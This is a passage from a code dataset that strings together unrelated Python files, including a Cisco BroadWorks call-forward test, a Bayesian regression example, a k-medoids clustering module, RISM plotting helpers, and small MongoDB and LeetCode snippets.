cmCC26459_3pcc_BS_Functional_229_SLCallForwardAlwaysConfiguration\n\nCopyright (c) 2016 Cisco Systems, Inc.\n\nName:\n cmCC26459_3pcc_BS_Functional_229_SLCallForwardAlwaysConfiguration.py\n\nPurpose:\n This test case verifies the synchronization of configuration of\n the Call Forward Always feature between the DUT and BroadWorks\n on shared line.\n\nAuthor:\n Yashashwini M B(ymuddena@cisco.com)\nModified:\n Sushmita roy(sushroy@cisco.com)\n\nReferences:\n US26459\n BW-SIPPhone-FunctionalTestPlan-R21.0\n\nDescription:\n Activate the Call Forward Always feature from the DUT and provide a\n forward-to number. Deactivate from the BroadWorks provisioning portal.\n Activate the Call Forward Always feature from the BroadWorks portal\n and provide a different forward-to number. Deactivate from the phone.\n\nTopology:\n 1. 4 3pcc phone\n 2. 2 Phones should register successfully with shared line.\n\nPass/Fail Criteria:\n Synchronization of configuration of the Call Forward Always feature\n between the DUT and BroadWorks on shared line.\n\nTest Steps:\n 1. Configure the primary DUT phone to register a shared line as instructed\n in the general test setup instructions\n 2. Configure the alternate DUT phone with a shared line matching the AoR\n for the BroadWorks users SCA as instructed in the general test setup\n instructions.\n 3. Activate the Call Forward Always feature from the DUT and provide a\n forward-to number.\n 4. Deactivate from the BroadWorks provisioning portal.\n 5. Activate the Call Forward Always feature from the BroadWorks portal\n and provide a different forward-to number.\n 6. Deactivate from the phone.\n Verify:\n 1. Activate Call Forward Always on the DUT 1 phone and provide a\n forward-to number.\n 1. DUT 1 shows Call Forward Always activated with forward-to number.\n 2. BroadWorks provisioning portal shows Call Forward Always\n activated with forward-to-number for the DUT 1 user.\n 2. Deactivate Call Forward Always from the BroadWorks provisioning portal.\n 1. DUT 1 shows Call Forward Always deactivated.\n 2. BroadWorks provisioning portal shows Call Forward Always\n deactivated for the DUT 1 user.\n 3. Activate Call Forward Always from the BroadWorks provisioning portal\n and provide a forward-to-number.\n 1. DUT 1 shows Call Forward Always activated with forward-to number.\n 2. BroadWorks provisioning portal shows Call Forward Always activated\n with forward-to-number for the DUT 1 user.\n 4. Deactivate Call Forward Always on the DUT 1 phone.\n 1. DUT 1 shows Call Forward Always deactivated.\n 2. 
BroadWorks provisioning portal shows Call Forward Always
 deactivated for the DUT 1 user.


 Notes:

 Known Bugs:
"""

import tng
import logging
from tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper
from tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper
from tng_sl.contrib.mpp.broadsoft_login_helper import BroadsoftLoginHelper
from tng_sl.contrib.mpp.tshark_helper import TsharkHelper
from tng_sl.contrib.setup_helper import SetupHelpersTestCase
from tng.frontend.timing import until
from tng.frontend.timing import wait
from tng_sl.contrib.mpp.broadsoft.broadsoft_config import BroadsoftConfig

log = logging.getLogger('SLCallForwardAlwaysConfiguration')


class SLCallForwardAlwaysConfiguration(SetupHelpersTestCase, tng.api.TestCase):

 helpers = (
 PhoneConfigHelper, BroadsoftLoginHelper, PhoneLineRegHelper,
 TsharkHelper)
 helper_num_devices = 4

 def setUp(self):
 log.info("Start of setUp")
 self.broadsoft = BroadsoftConfig()
 self.xsi_user_id1 = self.toolkit.get_test_env_info(
 section='bsoft', parameter_name="xsi_user_id1")
 self.shared_userID = '{}{}'.format(self.user_id1, 'a')
 self.device_type = 'Cisco-Hybrid{}'.format(
 self.oPhone1.get_web_status('Product_Name')[2:])
 self.product_model = self.oPhone1.get_web_status('Product_Name')

 log.info("Check Cfwd_always initial state on server")
 cfwd_always_initial_state =\
 self.broadsoft.get_call_forward_type_status(
 'CallForwardingAlways', user_id_proxy=self.xsi_user_id1,
 user_id=self.user_id1)

 if 'true' in cfwd_always_initial_state:
 log.info("Disable Cfwd_always on server")
 self.broadsoft.set_call_forward_type(
 'CallForwardingAlways', active='false',
 user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)

 log.info("Check Cfwd_always is disabled on server")
 verify_cfwd_always = self.broadsoft.get_call_forward_type_status(
 'CallForwardingAlways', user_id_proxy=self.xsi_user_id1,
 user_id=self.user_id1)
 self.assertEqual("false", verify_cfwd_always)

 def broadsoft_cleanup():
 log.info("Disable Cfwd_always on server")
 self.broadsoft.set_call_forward_type(
 'CallForwardingAlways', active='false',
 user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)

 log.info("verify cfwd_always disabled on both phone and server")
 until(
 self.verify_cfwd_always_disable, desired_result="Off",
 timeout=30, interval=5,
 raise_msg="Phone1 cfwd_always is not disabled")

 self.addCleanup(broadsoft_cleanup)

 # Configure Shared line on broadsoft server
 self.shared_name = self.bsoft_web.configure_shared_line(
 shared_number=self.shared_userID,
 device_type=self.device_type, user_phone_num=self.user_id1)

 def delete_sharedline():
 log.info("Delete configured Shared line")
 self.bsoft_web.delete_shared_line(
 user_phone_num=self.user_id1, shared_name=self.shared_name)

 self.addCleanup(delete_sharedline)

 log.info("End of setUp")

 def test_sl_call_forward_always_configuration(self):
 log.info("Start of test_sl_call_forward_always_configuration")

 log.info("Set shared line on phone1, phone2")
 for (diff_phones, user_id, shared_userid) in (
 (self.oPhone1, self.user_id1, ''),
 (self.oPhone2, self.shared_userID, self.shared_userID)):
 self.shared_config(
 diff_phones, user_id, shared_userid)
 wait(3, 'Wait for 3 seconds')

 log.info('Start tshark on linux')
 filter_cmd = 'port sip and host {} or host {}'.format(
 self.oPhone1.ip, self.oPhone2.ip)
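 # Restrict the capture to SIP packets to/from the two DUT phones so the
 # trace stays small and easy to inspect after the feature-key exchanges.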
self.tshark.tshark_start(filter_cmd)

 log.info("Enable Feature Key sync in Phone webpage")
 self.oPhone1.enable_disable_fks_and_send_dfks_update(
 line=1, set_enabled=1, fks_enable_disable=True, dfks_update=False)

 log.info(
 "From Phone1, set Call Forward Always to forward to {}".format(
 self.user_id3))
 self.oPhone1.enable_disable_fks_and_send_dfks_update(
 fwdastatus=1, fwdadn='{}'.format(self.user_id3),
 fks_enable_disable=False, dfks_update=True)

 log.info("verify cfwd_always enabled on both phone and server")
 until(
 self.verify_cfwd_always_enable, desired_result="true",
 timeout=30, interval=5,
 raise_msg="Phone1 cfwd_always is not enabled")

 log.info("Disable Cfwd_always on server")
 self.broadsoft.set_call_forward_type(
 'CallForwardingAlways', active='false',
 user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)

 log.info("verify cfwd_always disabled on both phone and server")
 until(
 self.verify_cfwd_always_disable, desired_result="Off",
 timeout=30, interval=5,
 raise_msg="Phone1 cfwd_always is not disabled")

 log.info("Enable Cfwd_always on server to forward to {}".format(
 self.user_id4))
 self.broadsoft.set_call_forward_type(
 'CallForwardingAlways', active='true',
 user_id_proxy=self.xsi_user_id1, user_id=self.user_id1,
 forward_to_phone_num=self.user_id4)

 log.info("verify cfwd_always enabled on both phone and server")
 until(
 self.verify_cfwd_always_enable, desired_result="true",
 timeout=30, interval=5,
 raise_msg="Phone1 cfwd_always is not enabled")

 log.info("Disable CfwdAlways on phone")
 self.oPhone1.enable_disable_fks_and_send_dfks_update(
 0, 0, '', 0, '', 0, '', fks_enable_disable=False,
 dfks_update=True)

 log.info("verify cfwd_always disabled on both phone and server")
 until(
 self.verify_cfwd_always_disable, desired_result="false",
 timeout=30, interval=5,
 raise_msg="Phone1 cfwd_always is not disabled")

 log.info("End of test_sl_call_forward_always_configuration")

 def shared_config(self, diff_phones, user_id, shared_userid=''):
 log.info("Configuring shared line on phone1 and phone2")

 diff_phones.ui.set_web_parameter_http(
 Share_Ext_1=['Ext 1', 'Share Line Appearance', 'Share Ext', 1],
 User_ID_1=['Ext 1', 'Subscriber Information', 'User ID', user_id],
 Call_Park_Monitor_Enable_1_=[
 'Ext 1', 'Call Park Monitor Enable', 1],
 Shared_User_ID=[
 'Ext 1', 'Share Line Appearance', 'Shared User ID',
 shared_userid],
 Share_Call_Appearance_1=[
 'Phone', 'Line Key 1', 'Share Call Appearance', ' shared'])

 appearance1, shared_ext1, user1, monitor_enable1 = (
 diff_phones.get_web_config(
 'Share_Call_Appearance_1_', 'Share_Ext_1_', 'User_ID_1_',
 'Call_Park_Monitor_Enable_1_'))
 shared_user_id = diff_phones.ui.get_web_parameter_http(
 'Ext 1', 'Shared User ID')

 self.assertEqual("Yes", monitor_enable1)
 self.assertEqual("shared", appearance1)
 self.assertEqual("Yes", shared_ext1)
 self.assertEqual(shared_userid, shared_user_id)
 self.assertEqual(user_id, user1)
 log.info("Shared line configuration on all phones completed")

 def verify_cfwd_always_enable(self):
 log.info("Check Cfwd_always is enabled on Phone")
 if '7832' not in self.product_model:
 until(
 self.verify_cfwd_always_on_phone, timeout=30, interval=5,
 raise_msg="Phone1 cfwd_always is not enabled",
 args=(self.oPhone1, 'SK_NCFWD'))

 log.info("Check Cfwd_always is enabled on server")
 self.verify_cfwd_always = 
self.broadsoft.get_call_forward_type_status(\n 'CallForwardingAlways', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n self.assertEqual(\"true\", self.verify_cfwd_always)\n\n def verify_cfwd_always_disable(self):\n log.info(\"Check Cfwd_always is disabled on Phone\")\n if '7832' not in self.product_model:\n until(\n self.verify_cfwd_always_on_phone, timeout=30, interval=5,\n raise_msg=\"Phone1 cfwd_always is not disabled\",\n args=(self.oPhone1, 'SK_CFWD'))\n\n log.info('Verify Cfwd always is disabled in server')\n cfwd_always_status = self.broadsoft.get_call_forward_type_status(\n 'CallForwardingAlways', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n self.assertEqual(\"false\", cfwd_always_status)\n\n def verify_cfwd_always_on_phone(self, phone, cfwd_skey):\n resp = phone.ccapi.get_mphone_state('GET_SOFTKEYS')\n for skey in resp:\n skey = skey.split(':')\n if cfwd_skey in skey:\n log.info('{} is present on phone {}'.format(cfwd_skey, phone))\n return True\n\n\n# this is called by 'tng run'\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/IOT/Broadsoft_Functional/cmCC26459_3pcc_BS_Functional_229_SLCallForwardAlwaysConfiguration.py","file_name":"cmCC26459_3pcc_BS_Functional_229_SLCallForwardAlwaysConfiguration.py","file_ext":"py","file_size_in_byte":12157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"250692056","text":"#!/usr/bin/env python\n\"\"\"Bayesian linear regression. Inference uses data subsampling and\nscales the log-likelihood.\n\nOne local optima is an inferred posterior mean of about [-5.0 5.0].\nThis implies there is some weird symmetry happening; this result can\nbe obtained by initializing the first coordinate to be negative.\nSimilar occurs for the second coordinate.\n\nNote as with all GAN-style training, the algorithm is not stable. It\nis recommended to monitor training and halt manually according to some\ncriterion (e.g., prediction accuracy on validation test, quality of\nsamples).\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport edward as ed\nimport numpy as np\nimport tensorflow as tf\n\nfrom edward.models import Normal\nfrom tensorflow.contrib import slim\n\n\ndef build_toy_dataset(N, w, noise_std=0.1):\n D = len(w)\n x = np.random.randn(N, D).astype(np.float32)\n y = np.dot(x, w) + np.random.normal(0, noise_std, size=N)\n return x, y\n\n\ndef ratio_estimator(data, local_vars, global_vars):\n \"\"\"Takes as input a dict of data x, local variable samples z, and\n global variable samples beta; outputs real values of shape\n (x.shape[0] + z.shape[0],). 
In this example, there are no local\n variables.\n \"\"\"\n # data[y] has shape (M,); global_vars[w] has shape (D,)\n # we concatenate w to each data point y, so input has shape (M, 1 + D)\n input = tf.concat([\n tf.reshape(data[y], [M, 1]),\n tf.tile(tf.reshape(global_vars[w], [1, D]), [M, 1])], 1)\n hidden = slim.fully_connected(input, 64, activation_fn=tf.nn.relu)\n output = slim.fully_connected(hidden, 1, activation_fn=None)\n return output\n\n\ndef next_batch(size, i):\n diff = (i + 1) * size - X_train.shape[0]\n if diff <= 0:\n X_batch = X_train[(i * size):((i + 1) * size), :]\n y_batch = y_train[(i * size):((i + 1) * size)]\n i = i + 1\n else:\n X_batch = np.concatenate((X_train[(i * size):, :], X_train[:diff, :]))\n y_batch = np.concatenate((y_train[(i * size):], y_train[:diff]))\n i = 0\n\n return X_batch, y_batch, i\n\n\ned.set_seed(42)\n\nN = 500 # number of data points\nM = 50 # batch size during training\nD = 2 # number of features\n\n# DATA\nw_true = np.ones(D) * 5.0\nX_train, y_train = build_toy_dataset(N, w_true)\nX_test, y_test = build_toy_dataset(N, w_true)\n\n# MODEL\nX = tf.placeholder(tf.float32, [M, D])\ny_ph = tf.placeholder(tf.float32, [M])\nw = Normal(mu=tf.zeros(D), sigma=tf.ones(D))\ny = Normal(mu=ed.dot(X, w), sigma=tf.ones(M))\n\n# INFERENCE\nqw = Normal(mu=tf.Variable(tf.random_normal([D]) + 1.0),\n sigma=tf.nn.softplus(tf.Variable(tf.random_normal([D]))))\n\ninference = ed.ImplicitKLqp(\n {w: qw}, data={y: y_ph},\n discriminator=ratio_estimator, global_vars={w: qw})\ninference.initialize(n_iter=5000, n_print=100, scale={y: float(N) / M})\n\nsess = ed.get_session()\ntf.global_variables_initializer().run()\n\ni = 0\nfor _ in range(inference.n_iter):\n X_batch, y_batch, i = next_batch(M, i)\n for _ in range(5):\n info_dict_d = inference.update(\n variables=\"Disc\", feed_dict={X: X_batch, y_ph: y_batch})\n\n info_dict = inference.update(\n variables=\"Gen\", feed_dict={X: X_batch, y_ph: y_batch})\n info_dict['loss_d'] = info_dict_d['loss_d']\n info_dict['t'] = info_dict['t'] // 6 # say set of 6 updates is 1 iteration\n\n t = info_dict['t']\n inference.print_progress(info_dict)\n if t == 1 or t % inference.n_print == 0:\n # Check inferred posterior parameters.\n mean, std = sess.run([qw.mean(), qw.std()])\n print(\"Inferred mean & std\")\n print(mean)\n print(std)\n","sub_path":"examples/bayesian_linear_regression_implicitklqp.py","file_name":"bayesian_linear_regression_implicitklqp.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"93674655","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial.distance import cityblock,euclidean\nfrom utils import refactor_and_plot\nimport copy\nimport matplotlib.cm as cm\nimport time\nimport numpy as np\nimport pandas as pd\n#from clustering import Clustering,Trajectory\n\n\n\n\ndef point_is_medoid(medoids, point):\n for e in medoids:\n if euclidean(e,point) == 0:\n return True\n return False\n\ndef display_pam_results_2D(data,nb_clusters,clusters, medoids, display_medoids = True):\n \n colors = cm.rainbow(np.linspace(0, 1, nb_clusters+1))\n\n for i,row in enumerate(data):\n c = colors[clusters[i]]\n if display_medoids and point_is_medoid(medoids, row):\n c = colors[-1]\n plt.scatter(row[0], row[1], color = c) \n\n\ndef compute_cost(medoid_indices,D,k,min_cost):\n clusters = []\n cost = 0\n for i in range(len(D)):\n distances = np.array([D[i,medoid_indices[j]] for j in range(k) ])\n \n closest_medoid_idx 
= distances.argmin()\n \n clusters.append(closest_medoid_idx)\n cost += distances[closest_medoid_idx]\n \n if cost > min_cost:\n return (False,cost,clusters,cost)\n return (True,cost,clusters,cost)\n\ndef pam(D, k):\n # initialization step\n former_cost = float(\"inf\")\n min_cost = float(\"inf\")\n clusters = []\n \n if k > len(D):\n print(\" number of medoids is greater than data length\")\n else:\n medoid_indices = np.random.choice(len(D),k, replace = False)\n _,new_cost,clusters,min_cost = compute_cost(medoid_indices,D,k,min_cost)\n #print(\"cost: \" + str(new_cost))\n \n while new_cost < former_cost:\n \n #display_pam_results_2D(data,clusters, data[medoid_indices],True)\n \n former_cost = new_cost\n for j in range(k):\n for i in range(len(D)):\n \n if i not in medoid_indices:\n \n med_idx = copy.copy(medoid_indices)\n med_idx[j] = i\n \n res = compute_cost(med_idx,D,k,min_cost)\n \n if res[0] == True:\n \n mod_cost,clusters,min_cost = res[1], res[2], res[3]\n \n if mod_cost < new_cost:\n \n medoid_indices = copy.copy(med_idx)\n new_cost = mod_cost\n \n #print(\"cost: \" + str(new_cost))\n \n return medoid_indices.tolist(), clusters\n\n\n","sub_path":"libs/pam.py","file_name":"pam.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"135728492","text":"import unittest\n\nimport numpy as np\n\nfrom analyser.patterns import ExclusivePattern, FuzzyPattern\n\n\nclass CoumpoundFuzzyPatternTestCase(unittest.TestCase):\n\n def test_onehot(self):\n ep = ExclusivePattern()\n a = np.array([[3.0, 2, 3], [2, 3, 5]])\n mask = -np.inf\n m = ep.onehot_column(a, -np.inf)\n print(m)\n self.assertTrue(np.allclose(m, np.array([[3, mask, mask], [mask, 3, 5]])))\n\n def test_exclusive_find(self):\n point1 = [1, 3]\n point2 = [1, 7]\n point3 = [1, 6]\n\n fp1 = FuzzyPattern(None)\n fp1.set_embeddings(np.array([point2]))\n\n fp2 = FuzzyPattern(None)\n fp2.set_embeddings(np.array([point3]))\n\n cp = ExclusivePattern()\n cp.add_pattern(fp1)\n cp.add_pattern(fp2)\n\n text_emb = np.array([point1, point2, point3, point3, point1])\n distances_per_pattern, ranges, winning_patterns = cp.calc_exclusive_distances(text_emb)\n\n print(\"distances_per_pattern\")\n print(distances_per_pattern[0])\n print(distances_per_pattern[1])\n\n print(\"winning_patterns\")\n print(winning_patterns)\n\n print(\"ranges\")\n print(ranges)\n\n def test_eval_distances(self):\n point1 = [1, 3]\n point2 = [1, 7]\n\n embedding_point = [1, 6]\n\n # fp1 = FuzzyPattern(np.array([[point3], [point2]]))\n\n fp1 = FuzzyPattern(None)\n fp1.set_embeddings(np.array([embedding_point]))\n\n text_emb = np.array([point1, point2, embedding_point])\n sums = fp1._eval_distances(text_emb)\n print('sums=', sums)\n print('sums.shape=', sums.shape, 'len of shape=', len(sums.shape))\n self.assertEqual(1, len(sums.shape))\n self.assertEqual(len(text_emb), len(sums))\n\n line0 = sums\n # print(line0)\n # print(sums[:,1])\n\n self.assertAlmostEqual(line0[2], 0)\n\n self.assertGreater(line0[0], line0[1])\n self.assertGreater(line0[1], line0[2])\n self.assertGreater(line0[0], line0[2])\n\n def test_eval_distances_2(self):\n point1 = [1, 3]\n point2 = [1, 7]\n\n embedding_point = [1, 6]\n embedding_point2 = [1, 6.01]\n\n # fp1 = FuzzyPattern(np.array([[point3], [point2]]))\n\n pattern = FuzzyPattern(None)\n pattern.set_embeddings(np.array([embedding_point, embedding_point2]))\n\n text_emb = np.array([point1, point2, embedding_point, embedding_point, point2])\n # 
----------------\n distances = pattern._eval_distances(text_emb)\n # ----------------\n print('sums=', distances)\n print('sums.shape=', distances.shape, 'len of shape=', len(distances.shape))\n self.assertEqual(1, len(distances.shape))\n self.assertEqual(len(text_emb), len(distances))\n\n self.assertAlmostEqual(distances[2], 0)\n\n self.assertGreater(distances[0], distances[1])\n self.assertGreater(distances[1], distances[2])\n self.assertGreater(distances[0], distances[2])\n\n self.assertEqual(2, np.argmin(distances))\n\n def test_eval_distances_large_pattern(self):\n point1 = [1, 3]\n point2 = [1, 7]\n\n embedding_point = [1, 6]\n embedding_point2 = [1, 6.01]\n\n # fp1 = FuzzyPattern(np.array([[point3], [point2]]))\n\n pattern = FuzzyPattern(None, _name='test pattern of len 2')\n pattern.set_embeddings(np.array([embedding_point, embedding_point2, embedding_point2, embedding_point2]))\n\n text_emb = np.array([point1, point2])\n # ----------------\n distances = pattern._eval_distances(text_emb)\n # ----------------\n print('sums=', distances)\n # print ('sums.shape=', distances.shape, 'len of shape=', len(distances.shape))\n # self.assertEqual(1, len(distances.shape))\n # self.assertEqual(len(text_emb), len(distances))\n #\n # self.assertAlmostEqual(distances[2], 0)\n #\n # self.assertGreater(distances[0], distances[1])\n # self.assertGreater(distances[1], distances[2])\n # self.assertGreater(distances[0], distances[2])\n #\n # self.assertEqual(2, np.argmin(distances))\n\n def test_etimate_confidence(self):\n from analyser.ml_tools import estimate_confidence\n confidence, sum_, nonzeros_count, _max = estimate_confidence([])\n self.assertEqual(0, confidence)\n self.assertTrue(sum_ is np.nan)\n self.assertEqual(0, nonzeros_count)\n self.assertTrue(_max is np.nan)\n\n def test_etimate_confidence2(self):\n from analyser.ml_tools import estimate_confidence\n confidence, sum_, nonzeros_count, _max = estimate_confidence([1])\n self.assertEqual(1, confidence)\n self.assertEqual(sum_, 1)\n self.assertEqual(1, nonzeros_count)\n self.assertEqual(_max, 1)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_patterns.py","file_name":"test_patterns.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"426965995","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n\ndef plot_esm1(filename, titlename=''):\n esm1 = np.loadtxt(filename, comments='#')\n\n fig = plt.figure(\n figsize=(6, 4), # inch\n dpi=100, # dpi\n edgecolor='black',\n linewidth='1'\n )\n\n fig.subplots_adjust(wspace=0.5, hspace=0.5)\n fig.suptitle(titlename)\n\n ax1 = fig.add_subplot(221)\n ax2 = fig.add_subplot(222)\n ax3 = fig.add_subplot(223)\n ax4 = fig.add_subplot(224)\n\n ax1.set_xlabel('z (A)')\n ax1.set_ylabel('rho (e/A)')\n ax2.set_xlabel('z (A)')\n ax2.set_ylabel('V_hartree (eV)')\n ax3.set_xlabel('z (A)')\n ax3.set_ylabel('V_ion (eV)')\n ax4.set_xlabel('z (A)')\n ax4.set_ylabel('V_electrostatic (eV)')\n\n ax4.axhline(0.0, linewidth='1', linestyle='dashed', color='black')\n\n ax1.plot(esm1[:, 0], esm1[:, 1], color='black', linestyle='solid')\n ax2.plot(esm1[:, 0], esm1[:, 2], color='black', linestyle='solid')\n ax3.plot(esm1[:, 0], esm1[:, 3], color='black', linestyle='solid')\n ax4.plot(esm1[:, 0], esm1[:, 4], color='black', linestyle='solid')\n\n plt.show()\n\n\ndef plot_1drism(filename, titlename='', normalization=False, max_x=None):\n 
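 """Plot site-site distribution functions from a 1D-RISM output file.

 Assumes the layout read below: atom labels on the fifth header line and
 numeric data from line six onward. With ``normalization`` each curve is
 divided by its last (asymptotic) value; ``max_x``, if given, caps the r axis.
 """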
with open(filename, 'r') as file:\n data_1drism = file.readlines()\n # line_molecules = data_1drism[3].split()\n line_atoms = data_1drism[4].split()\n\n data_1drism = np.loadtxt(filename, comments='#', skiprows=5)\n\n number_of_sublines = int(math.ceil((len(line_atoms) - 1) / 3))\n number_of_subplots = len(line_atoms) - 1\n\n fig = plt.figure(\n figsize=(15, 2 * number_of_sublines), # inch\n dpi=100, # dpi\n edgecolor='black',\n linewidth='1'\n )\n\n fig.subplots_adjust(wspace=0.5, hspace=0.75)\n fig.suptitle(titlename)\n\n factor_norm = 1\n\n for n_plot in range(1, number_of_subplots + 1):\n if normalization:\n factor_norm = data_1drism[-1, n_plot]\n\n ax1 = fig.add_subplot(number_of_sublines, 3, n_plot)\n if max_x is not None:\n ax1.set_xlim([0, max_x])\n\n ax1.set_xlabel('r (A)')\n ax1.set_ylabel('rdf')\n\n if (number_of_subplots % 3) == 0:\n if n_plot <= (number_of_subplots // 3 - 1) * 3:\n ax1.set_xlabel('')\n # ax1.set_xticklabels([])\n\n ax1.set_title(line_atoms[n_plot])\n ax1.plot(data_1drism[:, 0], data_1drism[:, n_plot] / factor_norm, color='black', linestyle='solid')\n\n # plt.savefig('%s.pdf'%titlename)\n plt.show()\n\n\ndef plot_rism1(filename, titlename=''):\n with open(filename, 'r') as file:\n data_rism1 = file.readlines()\n line_data = data_rism1[1].split()\n\n data_rism1 = np.loadtxt(filename, comments='#', skiprows=2)\n\n line_data = line_data[1:]\n new_line_data = [line_data[0] + ' ' + line_data[1]]\n for i in range(2, len(line_data), 3):\n new_line_data.append(line_data[i] + ' ' + line_data[i + 1] + ' ' + line_data[i + 2])\n\n number_of_sublines = int(math.ceil((len(new_line_data) - 1) / 3))\n number_of_subplots = len(new_line_data) - 1\n\n fig = plt.figure(\n figsize=(15, 2 * number_of_sublines), # inch\n dpi=100, # dpi\n edgecolor='black',\n linewidth='1'\n )\n\n fig.subplots_adjust(wspace=0.5, hspace=0.75)\n fig.suptitle(titlename)\n\n for n_plot in range(1, number_of_subplots + 1):\n ax1 = fig.add_subplot(number_of_sublines, 3, n_plot)\n ax1.set_xlabel(new_line_data[0])\n ax1.set_ylabel(new_line_data[n_plot])\n # ax1.set_title(line_atoms[n_plot])\n ax1.plot(data_rism1[:, 0], data_rism1[:, n_plot], color='black', linestyle='solid')\n\n plt.show()\n","sub_path":"pyscript/plottools.py","file_name":"plottools.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"39160740","text":"from __future__ import absolute_import, print_function, unicode_literals\nfrom builtins import dict, str\nimport os\nimport glob\nfrom indra import sparser\n\nbase_folder = os.path.join(os.environ['HOME'],\n 'data/darpa/phase3_eval/sources/sparser-20170330')\nsentences_folder = os.path.join(os.environ['HOME'],\n 'data/darpa/phase3_eval/sources/sparser-20170210')\n\n\ndef get_file_names(base_dir):\n fnames = glob.glob(os.path.join(base_dir, '*.xml'))\n return fnames\n\ndef get_file_stmts(fname):\n with open(fname, 'rb') as fh:\n print(fname)\n xml_bytes = fh.read()\n sp = sparser.process_xml(xml_bytes)\n if sp is None:\n print('ERROR: Could not process %s' % fname.split('/')[-1])\n print('----')\n return []\n return sp.statements\n\ndef read_stmts(folder):\n fnames = get_file_names(folder)\n all_stmts = []\n for fname in fnames:\n st = get_file_stmts(fname)\n all_stmts += st\n return all_stmts\n\nif __name__ == '__main__':\n stmts = 
read_stmts(base_folder)\n","sub_path":"models/phase3_eval/process_sparser.py","file_name":"process_sparser.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"363538320","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/lib.macosx-10.13-x86_64-2.7/Cheetah/Servlet.py\n# Compiled at: 2019-09-22 10:12:27\n__doc__ = \"\\nProvides an abstract Servlet baseclass for Cheetah's Template class\\n\"\nimport os.path\n\nclass Servlet(object):\n \"\"\"\n This class is an abstract baseclass for Cheetah.Template.Template.\n \"\"\"\n transaction = None\n application = None\n request = None\n session = None\n\n def respond(self, trans=None):\n raise NotImplementedError(\"couldn't find the template's main method. If you are using #extends\\nwithout #implements, try adding '#implements respond' to your template\\ndefinition.\")\n\n def sleep(self, transaction):\n super(Servlet, self).sleep(transaction)\n self.session = None\n self.request = None\n self._request = None\n self.response = None\n self.transaction = None\n return\n\n def shutdown(self):\n pass\n\n def serverSidePath(self, path=None, normpath=os.path.normpath, abspath=os.path.abspath):\n if path:\n return normpath(abspath(path.replace('\\\\', '/')))\n else:\n if hasattr(self, '_filePath') and self._filePath:\n return normpath(abspath(self._filePath))\n else:\n return\n\n return","sub_path":"pycfiles/cheetah_lint-1.1.0-py2.py3-none-any/Servlet.py","file_name":"Servlet.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"190449397","text":"# Given an array of nums, return how many of them contain even number of digits \n\n\ndef even_digits(nums):\n count = 0 \n for num in nums:\n if len(str(num)) % 2 == 0:\n count +=1 \n return count\n\n\n# print(even_digits([12,345,2,6,7896])) # 2\n# print(even_digits([555,901,482,1771])) # 1\n","sub_path":"LeetCode/Arrays101/even_digits.py","file_name":"even_digits.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"45712155","text":"from pymongo import MongoClient\nfrom urllib.parse import quote_plus\n\n\n\nuri = \"mongodb://localhost:27017\"\nclient = MongoClient(uri)\n\ndb = client.test_database\ndb = client['test-database']\ncollection = db.test_collection\ncollection = db['test-collection']\n\npost = {\n \"author\": \"Don John\",\n \"text\": \"First post on this container\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"]\n}\n\nposts = db.posts\n\npost_id = posts.insert_one(post).inserted_id\n\nprint(\"Post added with ID:\", post_id)\n\ntables = db.list_collection_names()\n\nprint(tables)\n","sub_path":"app/api/commun/mongo_handler.py","file_name":"mongo_handler.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"621372559","text":"import sys\nimport logging\nimport os\n\nlogger = logging.getLogger(__name__)\n\nfrom layerstack.args import ArgMode\nfrom layerstack.layer import Layer\nfrom layerstack.stack import Stack\n#from .helpers import layer_library_dir, stack_library_dir, placement_library_dir\nlayer_library_dir = '../layer_library'\nstack_library_dir = 
